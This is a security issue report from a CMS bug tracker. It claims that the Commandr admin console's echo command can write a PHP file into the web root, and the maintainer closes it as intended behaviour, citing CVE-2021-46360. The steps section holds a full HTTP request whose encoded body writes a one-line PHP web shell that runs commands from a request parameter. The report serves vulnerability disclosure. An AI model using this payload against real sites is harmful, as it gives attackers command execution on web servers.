#4833 - Ability To Upload Files Using Commandr
| Identifier | #4833 |
|---|---|
| Issue type | Major issue (breaks an entire feature) |
| Title | Ability To Upload Files Using Commandr |
| Status | Closed (no changes needed) |
| Tags | Type: Security (custom) |
| Handling member | Chris Graham |
| Version | 10.0.41 |
| Addon | commandr |
| Description | Hello, I found an issue where it's possible to write files into the web root directory, which allowed me to create a PHP file, which led to a code execution vulnerability. I wasn't sure if it actually was an issue at first, but after I read about CVE-2021-46360 it seemed like it wasn't the intention for Commandr to allow this kind of execution. I still feel like I'm wrong, so please tell me if this was intentional and not a bug. But if it is, it will lead to Remote Code Execution. |
| Steps to reproduce | So the issue lies with the echo command, where anyone can echo a file into the listed directories.
Here is the Burp request:
POST /composr/data/commandr.php?keep_session=90f2f9002e34b HTTP/1.1
Host: 192.168.43.139
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 156
Origin: http://192.168.43.139
Connection: close
Referer: http://192.168.43.139/composr/adminzone/index.php?page=admin-cns-members&type=step1
Cookie: has_cookies=1; last_visit=1649622823; commandr_dir=Lw%3D%3D; cms_autosave__composr_cms_index_php_page_cms_banners_type__edit_id_advertise_here=1; cms_autosave__composr_cms_index_php_page_cms_galleries_type_add=1; cms_session__c76d12e8a128796e506566d626aace23=90f2f9002e34b
_data=command%3Decho%2620-e%2620%263C%263Fphp%2620system(%2624_REQUEST%265B%2Fc%2F%265D)%263B%2620%263E%2620%262Froot%262Fshell.php&csrf_token=90f2f9002e34b
|
| Funded? | No |


Comments
This was our response to what became CVE-2021-46360:
https://compo.sr/news/view/security-issues/clarifying-the-nature.htm